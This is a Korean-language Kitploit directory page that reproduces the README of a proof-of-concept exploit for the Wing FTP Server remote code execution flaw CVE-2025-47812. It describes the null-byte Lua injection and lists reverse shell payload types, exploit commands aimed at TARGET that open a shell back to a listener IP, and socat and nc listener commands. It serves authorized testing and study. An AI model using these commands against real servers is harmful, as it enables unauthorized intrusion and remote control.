Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-47812-PoC — Wing FTP Server(CVE-2025-47812)용 인증되지 않은 원격 코드 실행 익스플로잇으로, 여러 리버스 셸 페이로드, 대화형 및 CLI 모드, 자동 세션 처리를 지원합니다. | Kitploit
도구/GitHubGitHub/havbay/cve-2025-47812-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingRemote Access Tool
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Wing FTP Server(CVE-2025-47812)용 인증되지 않은 원격 코드 실행 익스플로잇으로, 여러 리버스 셸 페이로드, 대화형 및 CLI 모드, 자동 세션 처리를 지원합니다.

저장소 보기
16개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-47812 — Wing FTP Server 원격 코드 실행 (RCE)

Python CVSS Type

개요

필드값
CVECVE-2025-47812
영향받는 버전Wing FTP Server < 7.4.4
유형인증 없는 원격 코드 실행
CVSS 점수10.0 (치명적)
수정 버전Wing FTP Server 7.4.4

동작 원리

이 취약점은 /loginok.html 로그인 엔드포인트에 존재합니다. 서버는 username 필드의 널 바이트(%00)를 제대로 검증하지 못합니다. 이로 인해 공격자는 세션 파일에 임의의 Lua 코드를 주입할 수 있으며, 이 세션 파일은 /dir.html과 같은 엔드포인트에 접근할 때 서버 측에서 평가됩니다. 이 과정에는 어떠한 인증도 필요하지 않습니다.

참고: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


기능

  • 인증 없는 명령 실행
  • 다양한 리버스 셸 페이로드 (socat, bash, python3, nc-e, nc-fifo, php)
  • 완전한 인터랙티브 TTY를 위해 socat 페이로드 우선 사용
  • 대상 연결 가능성 사전 점검
  • 시도마다 새 세션을 사용한 자동 세션 UID 추출
  • --payload 플래그로 특정 페이로드 선택
  • -o 옵션으로 명령 출력을 파일에 저장
  • 설정 가능한 --timeout 및 --delay
  • -v 옵션을 통한 상세/디버그 모드
  • Ctrl+C 우아한 처리
  • 리버스 셸 시도 후 페이로드 요약
  • CLI 인자 모드 + 인터랙티브 메뉴
  • 색상으로 구분된 출력

요구 사항

root@kitploit:~
pip install requests

사용법

인터랙티브 모드

root@kitploit:~
python3 wingftp_rce_exploit.py

CLI 모드

root@kitploit:~
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

모든 옵션

root@kitploit:~
-u / --url        Target base URL
-U / --username   Login username (default: anonymous)
-c / --command    Command to run (command mode)
-r / --rhost      Your listener IP (reverse shell mode)
-p / --rport      Your listener port (reverse shell mode)
     --payload    Specific payload to use (see list below)
     --timeout    HTTP request timeout in seconds (default: 10)
     --delay      Delay between payload attempts in seconds (default: 4)
-o / --output     Save command output to file
-v / --verbose    Enable debug output

리버스 셸 페이로드


예시

명령 실행

root@kitploit:~
Target URL : http://192.168.1.10:5466
Username   : anonymous
Choice     : 1
Command    : whoami

리버스 셸

1단계 — 리스너 시작 (전체 TTY에는 socat 권장):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

또는 nc 사용:

root@kitploit:~
nc -lvnp 4444

2단계 — 익스플로잇 실행:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

크레딧

  • 원본 PoC: blindma1den
  • 개선 및 확장: Havbuy

면책 조항

이 도구는 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다.
소유하지 않았거나 명시적인 서면 허가를 받지 않은 시스템에는 사용하지 마십시오.
무단 사용은 불법입니다. 저자는 오용에 대해 어떠한 책임도 지지 않습니다.

도구 다운로드
이름방식
socatsocat을 통한 전체 PTY
bash/dev/tcp 리다이렉트
python3소켓 서브프로세스
nc-e-e 플래그를 사용하는 Netcat
nc-fifoNetcat + mkfifo
phpPHP fsockopen